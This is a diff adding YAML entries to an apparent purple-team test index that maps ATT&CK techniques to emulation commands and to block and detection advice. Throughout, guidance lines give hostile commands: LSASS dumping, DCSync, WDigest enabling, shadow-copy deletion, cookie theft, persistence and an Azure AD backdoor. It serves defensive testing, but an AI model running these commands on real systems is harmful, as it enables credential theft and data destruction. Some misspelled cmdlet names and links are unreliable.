+  - 'Configure Advanced Audit for Kerberos operations on domain controllers via Group Policy. Using ticket request logs (Event ID 4769), detect suspicious ticket request operations using one or more of the following strategies: 1) Look for a high volume of ticket requests or unique service principals in a short period of time as compared to the typical number of requests by that source. 2) Configure a honey account with a service principal name set then alert when any ticket is requested for that SPN (this requires first configuring a SACL on the account as well as directory service object access auditing via Advanced Audit). 3) Look for downgraded encryption requests where the requested ticket uses RC4 while the target object uses AES (Note: in cases where the account has a weak password, AES tickets can be cracked in a realistic timeframe so attacks may request AES tickets).'
+  controls:
+  - SIEM
+  - Identity Threat Protection
+  metadata:
+    id: c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7
+    tid: T1558.003
+    tactic: TA0006
+    x_tools:
+    - https://github.com/GhostPack/Rubeus
+    x_vectr_id: c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7
+    isv: 1
+- name: Extract browser cookies
+  description: Extract cookie information from the user's browser
+  platforms:
+  - windows
+  guidance:
+  - cmd> SharpChrome.exe cookies
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  - Suspicious access to database files used by browsers detected using file system telemetry in the SIEM
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: 95790889-fb7d-42af-a221-3535e4197cde
+    tid: T1555.003
+    tactic: TA0006
+    x_tools:
+    - https://github.com/GhostPack/SharpDPAPI
+    x_vectr_id: 95790889-fb7d-42af-a221-3535e4197cde
+    isv: 1
+- name: Extract domain user credentials via replication
+  description: Replicate a user's hash from a domain controller using replication APIs (DCSync).
+  platforms:
+  - windows
+  guidance:
+  - (from workstation) mimikatz> lsadump::dcsync /domain:{{ domain }} /user:{{ user }}
+  block:
+  - ''
+  detect:
+  - Enable object logging for directory services via Group Policy Advanced Audit then alert when non-domin controller sources replicate directory objects. Specifically, look for Event ID 4662 events where the action performed was related to replicating object changes (e.g. either/both of "Replicating Directory Changes all" and "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"/"{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}")
+  - https://blog.blacklanternsecurity.com/p/detecting-dcsync
+  controls:
+  - SIEM
+  - Identity Threat Protection
+  metadata:
+    id: d6dd145b-c7ae-4f79-bc07-179a012a7a07
+    tid: T1003.006
+    tactic: TA0006
+    x_vectr_id: d6dd145b-c7ae-4f79-bc07-179a012a7a07
+    isv: 1
+- name: Register Security Service Provider (SSP) in LSASS
+  description: Register an SSP DLL that into LSASS. This technique can be used by adversaries to harvest credentials that traverse through LSASS.
+  platforms:
+  - windows
+  guidance:
+  - shell> {{ ssp_loader }}
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  - Enable the LSA "RunAsPPL" protection to prevent the loading of untrusted DLLs by LSASS
+  detect:
+  - For SSPs registered permanently, detect modifications to the "Security Packages" key under HKLM\System\CurrentControlSet\Control\LSA\. Additionally look for DLL writes to System32.
+  - For temporary SSP loads, detect anomalous module loads by LSASS.exe after establishing a basline for normal module loads
+  controls:
+  - Endpoint Protection
+  metadata:
+    id: 6efcb4c5-d740-41ce-a0dc-b63734813928
+    tid: T1547.005
+    tactic: TA0006
+    x_references:
+    - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/intercepting-logon-credentials-via-custom-security-support-provider-and-authentication-package#loading-ssp-without-reboot
+    x_vectr_id: 6efcb4c5-d740-41ce-a0dc-b63734813928
+    isv: 1
+- name: Enabled WDigest via Registry
+  description: Set the UseLogonCredential key in the WDigest hive to enable cleartext credential storage in-memory
+  platforms:
+  - windows
+  guidance:
+  - cmd> reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
+  block:
+  - Suspicious Registry modification blocked by endpoint security tool
+  detect:
+  - Enable object logging for the Registry via Group Policy Advanced Audit then configure a SACL on the Registry either directly or via the global audit settings in Group Policy. Trigger an alert when modification are made the Registry using object access logs (Event ID 4656).
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: 9a66066b-997b-4ff1-8b4b-c14d982df861
+    tid: T1112
+    tactic: TA0005
+    x_vectr_id: 9a66066b-997b-4ff1-8b4b-c14d982df861
+    isv: 1
+Impact:
+- name: Delete shadows with vssadmin.exe
+  description: Delete volume shadow copies on the host to inhibit file system recovery
+  platforms:
+  - windows
+  guidance:
+  - CMD> vssadmin.exe delete shadows /all /quiet
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+  - Suspicious Volume Shadow Service use detected in the SIEM using telemetry
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: 31d4a02d-4a66-4740-a9c4-8814319fd5c4
+    tid: T1490
+    tactic: TA0040
+    x_vectr_id: 31d4a02d-4a66-4740-a9c4-8814319fd5c4
+    isv: 1
+- name: Encrypt a large amount of files
+  description: Encrypt a large amount of files on the endpoint to simulate ransomware
+  platforms:
+  guidance:
+  - cmd> coldcryptor.exe run {{ extension }}
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  - Detect common ransomware extensions using file system telemetry
+  controls:
+  - Endpoint Protection
+  metadata:
+    id: 72224b97-93d1-4087-8b82-6b4342bf2e09
+    tid: T1486
+    tactic: TA0040
+    x_tools:
+    - https://github.com/2XXE-SRA/payload_resources/tree/master/coldencryptor
+    x_vectr_id: 72224b97-93d1-4087-8b82-6b4342bf2e09
+    isv: 1
+- name: Modify group policy object
+  description: Modify a domain group policy object. This can be used for activities like persisting access to the environment, disabling security controls, and executing ransomware on domain systems.
+  platforms:
+  guidance:
+  block:
+  - ''
+  detect:
+  - Configure auditing on group policy objects then look for anomalous changes, such as those performed by unexpected principals or changes occuring outside of expected business processes
+  controls:
+  - SIEM
+  metadata:
+    id: 45591791-541b-4a27-bda9-75e6d78a66f4
+    tid: T1484.001
+    tactic: TA0005
+    x_vectr_id: 45591791-541b-4a27-bda9-75e6d78a66f4
+    isv: 1
+Lateral Movement:
+- name: Lateral Movement via RDP
+  description: Perform an interactive logons to a Windows system via RDP
+  platforms:
+  - windows
+  guidance:
+  - CMD> mstsc /v:{{ target }}
+  block:
+  - Host-based firewalls prevent direct communications over common ports/protocols
+  detect:
+  - Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+  controls:
+  - SIEM
+  - Identity Threat Protection
+  - Hardening
+  metadata:
+    id: 0735ef7e-438f-4fc9-a656-7d11d73fbc61
+    tid: T1021.001
+    tactic: TA0008
+    x_vectr_id: 0735ef7e-438f-4fc9-a656-7d11d73fbc61
+    isv: 1
+- name: Lateral Movement via PsExec
+  description: Move to another system by creating a service remotely via Sysinternals PsExec
+  platforms:
+  - windows
+  guidance:
+  - CMD> psexec -s \{{ target }} {{ command }}
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  - Host-based firewalls prevent direct communications over common ports/protocols
+  - Remote access to the service control manager is blocked by a DACL, preventing service creation by remote users
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+  - Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+  controls:
+  - Endpoint Protection
+  - SIEM
+  - Identity Threat Protection
+  - Hardening
+  metadata:
+    id: 9b5396f2-6e4a-498a-995e-47e48a99bf76
+    tid: T1021.002
+    tactic: TA0008
+    x_vectr_id: 9b5396f2-6e4a-498a-995e-47e48a99bf76
+    isv: 1
+- name: Lateral Movement via WMI
+  description: Move to another system by using Windows Management Instrumentation (WMI) to spawn a process on that target system
+  platforms:
+  - windows
+  guidance:
+  - CMD> wmic /node:"{{ target }}" process call create "{{ command }}"
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  - Host-based firewalls prevent direct communications over common ports/protocols
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+  - Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+  controls:
+  - Endpoint Protection
+  - SIEM
+  - Identity Threat Protection
+  - Hardening
+  metadata:
+    id: 3c337f53-d086-4f2f-818a-08fb1a1c5f79
+    tid: T1021.003
+    tactic: TA0008
+    x_vectr_id: 3c337f53-d086-4f2f-818a-08fb1a1c5f79
+    isv: 1
+- name: Remote .exe copy
+  description: Copy an .exe payload to a temp folder on the remote target
+  platforms:
+  guidance:
+  - cmd> copy {{ exe }} \\{{ target }}\{{ share }}\{{ path }}
+  block:
+  - Host-based firewalls prevent direct communications over common ports/protocols
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+  - Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+  controls:
+  - Endpoint Protection
+  - Antivirus
+  - SIEM
+  metadata:
+    id: b74ff4c5-eebf-466b-af85-341b19c4c748
+    tid: T1570
+    tactic: TA0008
+    x_vectr_id: b74ff4c5-eebf-466b-af85-341b19c4c748
+    isv: 1
+Persistence:
+- name: Persist via new scheduled task
+  description: Persist on a system by creating a new scheduled task
+  platforms:
+  - windows
+  guidance:
+  - cmd> schtasks.exe /create /sc daily /tn {{ task_name }} /tr {{ command }} /st 20:00
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  - Use scheduled task creation events (Event ID 4698) to identify newly created scheduled tasks. Look specifically for events that are anomalous as compared to other task creation events in the environment, such as events where the command is unique across all other tasks and events created by principals that do not commonly create tasks.
+  controls:
+  - SIEM
+  - Endpoint Protection
+  metadata:
+    id: 20a6dace-d801-42f5-b659-6cf91e39d273
+    tid: T1053.005
+    tactic: TA0003
+    x_vectr_id: 20a6dace-d801-42f5-b659-6cf91e39d273
+    isv: 1
+- name: Persist via new Windows service
+  description: Persist on a system by creating a new service
+  platforms:
+  - windows
+  guidance:
+  - CMD> sc create {{ service_name }} binPath= "{{ command }}"
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+  - Use services creation events (Event ID 4697) to identify newly created services. Look specifically for events that are anomalous as compared to other service creation events in the environment, such as events where the command is unique across all other services and events created by principals that do not commonly create services.
+  controls:
+  - SIEM
+  - Endpoint Protection
+  metadata:
+    id: 5c24b470-4a3b-4de0-8adf-3d63bc8d5737
+    tid: T1543.003
+    tactic: TA0003
+    x_vectr_id: 5c24b470-4a3b-4de0-8adf-3d63bc8d5737
+    isv: 1
+- name: Persist via Registry Winlogon Shell
+  description: Run a payload during user login by setting a Registry Winlogon key
+  platforms:
+  - windows
+  guidance:
+  - CMD> reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /f "{{ command }}"
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  - Enable object logging for the Registry via Group Policy Advanced Audit then configure a SACL on the Registry either directly or via the global audit settings in Group Policy. Trigger an alert when modification are made the Registry using object access logs (Event ID 4656).
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: ab8bd5d9-b8cb-43e6-a632-03aef9e9a622
+    tid: T1547.004
+    tactic: TA0003
+    x_vectr_id: ab8bd5d9-b8cb-43e6-a632-03aef9e9a622
+    isv: 1
+- name: Register a new device in Azure AD
+  description: Register a new device in Azure AD
+  platforms:
+  - azuread
+  guidance:
+  - PS> Join-AADIntDeviceToAurzeAD -DeviceName {{ name }} -DeviceType "purple" -OSVersion "1"
+  block:
+  - 'Prevent users outside of approved groups from being able to register new devices in the tenant. Refer to documentation for details: https://learn.microsoft.com/en-us/azure/active-directory/devices/device-management-azure-portal#configure-device-settings'
+  detect:
+  - Detect anomalous device registration events by using Azure audit logs
+  controls:
+  - SIEM
+  - Hardening
+  metadata:
+    id: 05d0ccbf-9f9f-4046-b5f0-09c149623f96
+    tid: T1098.005
+    tactic: TA0003
+    x_tools:
+    - AADInternals
+    x_references:
+    - htpts://aadinternals.nom/post/prt/
+    x_vectr_id: 05d0ccbf-9f9f-4046-b5f0-09c149623f96
+    isv: 1
+- name: Configure a custom federated domain
+  description: Convert a custom domain in the Azure Active Directory tenant into a federated domain. This can be used for persistent access into the tenant.
+  platforms:
+  - azuread
+  guidance:
+  - PS> ConvertTo-AADIntBackdoor -AccessToken {{ access_token }} -DomainName "{{ domain }}"
+  block:
+  - ''
+  detect:
+  - Monitor for unusual domain federation via the SEIM. Examine AAD logs for actions that "Set domain authentication" to "federated".
+  - https://www.inversecos.com/2021/11/how-to-detect-azure-active-directory.html
+  controls:
+  - SIEM
+  metadata:
+    id: b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1
+    tid: T1484.002
+    tactic: TA0003
+    x_tools:
+    - AADInternals
+    x_references:
+    - https://o365blog.com/post/aadbackdoor/
+    x_vectr_id: b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1
+    isv: 1
+Exfiltration:
+- name: Extract sensitive data over HTTP
+  description: Extract data from the network over HTTP tcp/80 to an external host or IP.
+  platforms:
+  guidance:
+  - http://dlptest.com/http-post/
+  block:
+  - Sensitive data sent over the network is blocked by network DLP tool
+  detect:
+  - Sensitive data sent over the network is detected by network DLP tool
+  controls:
+  - Firewall
+  - DLP
+  - Web Gateway
+  metadata:
+    id: 7d63d9d1-0bb4-41b5-9fe2-785bad419860
+    tid: T1048.003
+    tactic: TA0010
+    x_vectr_id: 7d63d9d1-0bb4-41b5-9fe2-785bad419860
+    isv: 1
+- name: Extract data to cloud storage service
+  description: Extract data from the internal network to a cloud storage service like MEGA, Google Drive, or Box
+  platforms:
+  guidance:
+  block:
+  - Sensitive data sent over the network is blocked by network DLP tool
+  - Network security tool detects connection to domain based on category from proxy or DNS
+  detect:
+  - Sensitive data sent over the network is detected by network DLP tool
+  controls:
+  - Firewall
+  - DLP
+  - Web Gateway
+  metadata:
+    id: 9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66
+    tid: T1567.002
+    tactic: TA0010
+    x_vectr_id: 9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66
+    isv: 1
+- name: Extract sensitive data over HTTP C2
+  description: Extract data from the network via an HTTP C2 channel over tcp/80 to external host or IP
+  platforms:
+  guidance:
+  - implant> download {{ file }}
+  block:
+  - Sensitive data sent over the network is blocked by network DLP tool
+  - C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool
+  detect:
+  - C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool
+  controls:
+  - Firewall
+  - DLP
+  - Web Gateway
+  metadata:
+    id: b48fa856-d004-4d5a-918f-d9429a9cd8e3
+    tid: T1041
+    tactic: TA0010
+    x_vectr_id: b48fa856-d004-4d5a-918f-d9429a9cd8e3
+    isv: 1
+Execution:
+- name: Macro - Remote Template
+  description: Execute a malicious Office document on the endpoint that will load a macro stored in a remote template document
+  platforms:
+  - windows
+  guidance:
+  block:
+  - Macro execution is blocked by GPO policy
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  - Payload on disk deleted/quarantined by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+  - Payload on disk triggers an alert with endpoint security tool
+  controls:
+  - Endpoint Protection
+  - Hardening
+  - SIEM
+  metadata:
+    id: a7134d71-dc49-41a8-a309-ec520c96a089
+    tid: T1221
+    tactic: TA0005
+    x_vectr_id: a7134d71-dc49-41a8-a309-ec520c96a089
+    isv: 1
+Collection:
+- name: Screen Capture
+  description: Capture an image of the user's screen
+  platforms:
+  guidance:
+  - "implant> {{ screenshot_command }}\nOR \nshell> {{ screenshot_tool }}"
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  controls:
+  - Endpoint Protection
+  metadata:
+    id: 804512cc-4acf-4be3-a577-ce02ea723fab
+    tid: T1113
+    tactic: TA0009
+    x_tools:
+    - https://github.com/2XXE-SRA/payload_resources/blob/master/csharp/screenshot.cs
+    x_vectr_id: 804512cc-4acf-4be3-a577-ce02ea723fab
+    isv: 1
+- name: Keylogger
+  description: Log user keystrokes
+  platforms:
+  - windows
+  guidance:
+  - "implant> {{ keylog_command }}\nOR \nshell> {{ keylog_tool }}"
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  controls:
+  - Endpoint Protection
+  metadata:
+    id: be524cb1-12e6-4708-ad57-faf91dfad9de
+    tid: T1056.001
+    tactic: TA0009
+    x_tools:
+    - https://github.com/2XXE-SRA/payload_resources/blob/master/csharp/keylog.cs
+    x_vectr_id: be524cb1-12e6-4708-ad57-faf91dfad9de
+    isv: 1
+metadata:
+  prefix: FSI
+  bundle: Financial Services Index 2024 v1.0
diff --git a/fs-index-2024/techniques/Collection/804512cc-4acf-4be3-a577-ce02ea723fab.yml b/fs-index-2024/techniques/Collection/804512cc-4acf-4be3-a577-ce02ea723fab.yml
new file mode 100644
index 0000000..d274f20
--- /dev/null
+++ b/fs-index-2024/techniques/Collection/804512cc-4acf-4be3-a577-ce02ea723fab.yml
@@ -0,0 +1,19 @@
+name: Screen Capture
+description: Capture an image of the user's screen
+platforms:
+guidance:
+- "implant> {{ screenshot_command }}\nOR \nshell> {{ screenshot_tool }}"
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+controls:
+- Endpoint Protection
+metadata:
+  id: 804512cc-4acf-4be3-a577-ce02ea723fab
+  tid: T1113
+  tactic: TA0009
+  x_tools:
+  - https://github.com/2XXE-SRA/payload_resources/blob/master/csharp/screenshot.cs
+  x_vectr_id: 804512cc-4acf-4be3-a577-ce02ea723fab
+  isv: 1
diff --git a/fs-index-2024/techniques/Collection/be524cb1-12e6-4708-ad57-faf91dfad9de.yml b/fs-index-2024/techniques/Collection/be524cb1-12e6-4708-ad57-faf91dfad9de.yml
new file mode 100644
index 0000000..62f850b
--- /dev/null
+++ b/fs-index-2024/techniques/Collection/be524cb1-12e6-4708-ad57-faf91dfad9de.yml
@@ -0,0 +1,20 @@
+name: Keylogger
+description: Log user keystrokes
+platforms:
+- windows
+guidance:
+- "implant> {{ keylog_command }}\nOR \nshell> {{ keylog_tool }}"
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+controls:
+- Endpoint Protection
+metadata:
+  id: be524cb1-12e6-4708-ad57-faf91dfad9de
+  tid: T1056.001
+  tactic: TA0009
+  x_tools:
+  - https://github.com/2XXE-SRA/payload_resources/blob/master/csharp/keylog.cs
+  x_vectr_id: be524cb1-12e6-4708-ad57-faf91dfad9de
+  isv: 1
diff --git a/fs-index-2024/techniques/CommandandControl/10f6c44e-b862-4553-bc55-68f6d941bcfb.yml b/fs-index-2024/techniques/CommandandControl/10f6c44e-b862-4553-bc55-68f6d941bcfb.yml
new file mode 100644
index 0000000..250d96d
--- /dev/null
+++ b/fs-index-2024/techniques/CommandandControl/10f6c44e-b862-4553-bc55-68f6d941bcfb.yml
@@ -0,0 +1,20 @@
+name: Access via remote assistance tool
+description: Establish connection to system using a legitimate remote assistance application
+platforms:
+guidance:
+block:
+- Block the installation and use of unapproved third-party utilities via application control software
+- Connections to known remote access service domains/IPs are blocked
+- Remote access connection attempts originating from users outside of the tenant are blocked
+detect:
+- Connections to known remote access service domains/IPs are detected
+controls:
+- Application Control
+- ID/PS
+- Firewall
+metadata:
+  id: 10f6c44e-b862-4553-bc55-68f6d941bcfb
+  tid: T1219
+  tactic: TA0011
+  x_vectr_id: 10f6c44e-b862-4553-bc55-68f6d941bcfb
+  isv: 1
diff --git a/fs-index-2024/techniques/CommandandControl/38064494-0d58-4f48-bce8-b5b7ea7db3da.yml b/fs-index-2024/techniques/CommandandControl/38064494-0d58-4f48-bce8-b5b7ea7db3da.yml
new file mode 100644
index 0000000..fa200fe
--- /dev/null
+++ b/fs-index-2024/techniques/CommandandControl/38064494-0d58-4f48-bce8-b5b7ea7db3da.yml
@@ -0,0 +1,18 @@
+name: HTTP C2 over tcp/80
+description: Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTP
+platforms:
+guidance:
+block:
+- C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool
+detect:
+- C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool
+controls:
+- Firewall
+- ID/PS
+- Web Gateway
+metadata:
+  id: 38064494-0d58-4f48-bce8-b5b7ea7db3da
+  tid: T1071.001
+  tactic: TA0011
+  x_vectr_id: 38064494-0d58-4f48-bce8-b5b7ea7db3da
+  isv: 1
diff --git a/fs-index-2024/techniques/CommandandControl/3ed2f449-744b-48c3-80d2-854386e446a0.yml b/fs-index-2024/techniques/CommandandControl/3ed2f449-744b-48c3-80d2-854386e446a0.yml
new file mode 100644
index 0000000..075c765
--- /dev/null
+++ b/fs-index-2024/techniques/CommandandControl/3ed2f449-744b-48c3-80d2-854386e446a0.yml
@@ -0,0 +1,18 @@
+name: HTTPS C2 over tcp/443
+description: Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTPS
+platforms:
+guidance:
+block:
+- C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool
+detect:
+- C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool
+controls:
+- Firewall
+- ID/PS
+- Web Gateway
+metadata:
+  id: 3ed2f449-744b-48c3-80d2-854386e446a0
+  tid: T1071.001
+  tactic: TA0011
+  x_vectr_id: 3ed2f449-744b-48c3-80d2-854386e446a0
+  isv: 1
diff --git a/fs-index-2024/techniques/CommandandControl/43ab96a9-b2c0-442a-b8e4-18e172a1a2ce.yml b/fs-index-2024/techniques/CommandandControl/43ab96a9-b2c0-442a-b8e4-18e172a1a2ce.yml
new file mode 100644
index 0000000..7de64dc
--- /dev/null
+++ b/fs-index-2024/techniques/CommandandControl/43ab96a9-b2c0-442a-b8e4-18e172a1a2ce.yml
@@ -0,0 +1,21 @@
+name: C2 over Dropbox
+description: Establish a command-and-control connection from a managed asset to an external server on the Internet by tunneling the traffic through Dropbox. This will masquerade the command-and-control traffic as legitimate application traffic.
+platforms:
+guidance:
+block:
+- C2 channel using legitimate service is blocked by proxy, firewall, or network behavioral/UEBA tool
+- Connection to legitimate service that falls outside standard business operations blocked based on domain and/or domain categorization
+detect:
+- C2 channel using legitimate service is detected by proxy, firewall, or network behavioral/UEBA tool
+controls:
+- Firewall
+- ID/PS
+- Web Gateway
+metadata:
+  id: 43ab96a9-b2c0-442a-b8e4-18e172a1a2ce
+  tid: T1102.002
+  tactic: TA0011
+  x_references:
+  - https://www.zscaler.com/blogs/security-research/apt-31-leverages-covid-19-vaccine-theme-and-abuses-legitimate-online
+  x_vectr_id: 43ab96a9-b2c0-442a-b8e4-18e172a1a2ce
+  isv: 1
diff --git a/fs-index-2024/techniques/CommandandControl/9755cd8b-5212-4331-8c6e-afb27404a4b9.yml b/fs-index-2024/techniques/CommandandControl/9755cd8b-5212-4331-8c6e-afb27404a4b9.yml
new file mode 100644
index 0000000..ac75a59
--- /dev/null
+++ b/fs-index-2024/techniques/CommandandControl/9755cd8b-5212-4331-8c6e-afb27404a4b9.yml
@@ -0,0 +1,18 @@
+name: Remote tool download over HTTP
+description: Download a tool from a public hosting location onto the victim system
+platforms:
+guidance:
+block:
+- Signatures for known-malicious tools/traffic are blocked by network security controls such as an ID/PS
+detect:
+- Signatures for known-malicious tools/traffic are detected by network security controls such as an ID/PS
+controls:
+- Firewall
+- ID/PS
+- Web Gateway
+metadata:
+  id: 9755cd8b-5212-4331-8c6e-afb27404a4b9
+  tid: T1105
+  tactic: TA0011
+  x_vectr_id: 9755cd8b-5212-4331-8c6e-afb27404a4b9
+  isv: 1
diff --git a/fs-index-2024/techniques/CredentialAccess/314b4f6a-b27a-4a55-af5c-c98bc3146dd8.yml b/fs-index-2024/techniques/CredentialAccess/314b4f6a-b27a-4a55-af5c-c98bc3146dd8.yml
new file mode 100644
index 0000000..12180d9
--- /dev/null
+++ b/fs-index-2024/techniques/CredentialAccess/314b4f6a-b27a-4a55-af5c-c98bc3146dd8.yml
@@ -0,0 +1,21 @@
+name: Dump LSASS memory using builtin comsvcs.dll
+description: Use rundll32.exe and comsvcs.dll to dump LSASS process memory to disk
+platforms:
+- windows
+guidance:
+- shell> rundll32.exe c:\windows\system32\comsvcs.dll MiniDump {{ lsass_pid }} {{ outpath }}  full
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Enable Credential Guard to prevent traditional process dumping of LSASS
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+controls:
+- SIEM
+- Endpoint Protection
+- Hardening
+metadata:
+  id: 314b4f6a-b27a-4a55-af5c-c98bc3146dd8
+  tid: T1003.001
+  tactic: TA0006
+  x_vectr_id: 314b4f6a-b27a-4a55-af5c-c98bc3146dd8
+  isv: 1
diff --git a/fs-index-2024/techniques/CredentialAccess/6efcb4c5-d740-41ce-a0dc-b63734813928.yml b/fs-index-2024/techniques/CredentialAccess/6efcb4c5-d740-41ce-a0dc-b63734813928.yml
new file mode 100644
index 0000000..a27e66e
--- /dev/null
+++ b/fs-index-2024/techniques/CredentialAccess/6efcb4c5-d740-41ce-a0dc-b63734813928.yml
@@ -0,0 +1,22 @@
+name: Register Security Service Provider (SSP) in LSASS
+description: Register an SSP DLL that into LSASS. This technique can be used by adversaries to harvest credentials that traverse through LSASS.
+platforms:
+- windows
+guidance:
+- shell> {{ ssp_loader }}
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Enable the LSA "RunAsPPL" protection to prevent the loading of untrusted DLLs by LSASS
+detect:
+- For SSPs registered permanently, detect modifications to the "Security Packages" key under HKLM\System\CurrentControlSet\Control\LSA\. Additionally look for DLL writes to System32.
+- For temporary SSP loads, detect anomalous module loads by LSASS.exe after establishing a basline for normal module loads
+controls:
+- Endpoint Protection
+metadata:
+  id: 6efcb4c5-d740-41ce-a0dc-b63734813928
+  tid: T1547.005
+  tactic: TA0006
+  x_references:
+  - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/intercepting-logon-credentials-via-custom-security-support-provider-and-authentication-package#loading-ssp-without-reboot
+  x_vectr_id: 6efcb4c5-d740-41ce-a0dc-b63734813928
+  isv: 1
diff --git a/fs-index-2024/techniques/CredentialAccess/79640171-eeb3-44c2-9d9e-cf29c7f57af1.yml b/fs-index-2024/techniques/CredentialAccess/79640171-eeb3-44c2-9d9e-cf29c7f57af1.yml
new file mode 100644
index 0000000..821fcc8
--- /dev/null
+++ b/fs-index-2024/techniques/CredentialAccess/79640171-eeb3-44c2-9d9e-cf29c7f57af1.yml
@@ -0,0 +1,25 @@
+name: Dump LSASS memory using Sysinternals ProcDump
+description: Use ProcDump from Sysinternals to dump LSASS process memory
+platforms:
+- windows
+guidance:
+- CMD> procdump -ma lsass.exe dump
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Enable Credential Guard to prevent traditional process dumping of LSASS
+- Block the installation and use of unapproved third-party utilities via application control software
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+controls:
+- SIEM
+- Endpoint Protection
+- Hardening
+- Application Control
+metadata:
+  id: 79640171-eeb3-44c2-9d9e-cf29c7f57af1
+  tid: T1003.001
+  tactic: TA0006
+  x_tools:
+  - https://learn.microsoft.com/en-us/sysinternals/downloads/procdump
+  x_vectr_id: 79640171-eeb3-44c2-9d9e-cf29c7f57af1
+  isv: 1
diff --git a/fs-index-2024/techniques/CredentialAccess/8eeb3c12-dc2e-4791-aff5-e81501312886.yml b/fs-index-2024/techniques/CredentialAccess/8eeb3c12-dc2e-4791-aff5-e81501312886.yml
new file mode 100644
index 0000000..cd0d822
--- /dev/null
+++ b/fs-index-2024/techniques/CredentialAccess/8eeb3c12-dc2e-4791-aff5-e81501312886.yml
@@ -0,0 +1,20 @@
+name: Extract Logonpasswords via Nanodump
+description: Use nanodump to extract credentials from LSASS process memory
+platforms:
+- windows
+guidance:
+- cmd> nanodump.exe --duplicate -w {{ out_file }}
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Enable Credential Guard to prevent traditional process dumping of LSASS
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+controls:
+- Endpoint Protection
+- Hardening
+metadata:
+  id: 8eeb3c12-dc2e-4791-aff5-e81501312886
+  tid: T1003.001
+  tactic: TA0006
+  x_vectr_id: 8eeb3c12-dc2e-4791-aff5-e81501312886
+  isv: 1
diff --git a/fs-index-2024/techniques/CredentialAccess/95790889-fb7d-42af-a221-3535e4197cde.yml b/fs-index-2024/techniques/CredentialAccess/95790889-fb7d-42af-a221-3535e4197cde.yml
new file mode 100644
index 0000000..e5b69b7
--- /dev/null
+++ b/fs-index-2024/techniques/CredentialAccess/95790889-fb7d-42af-a221-3535e4197cde.yml
@@ -0,0 +1,22 @@
+name: Extract browser cookies
+description: Extract cookie information from the user's browser
+platforms:
+- windows
+guidance:
+- cmd> SharpChrome.exe cookies
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
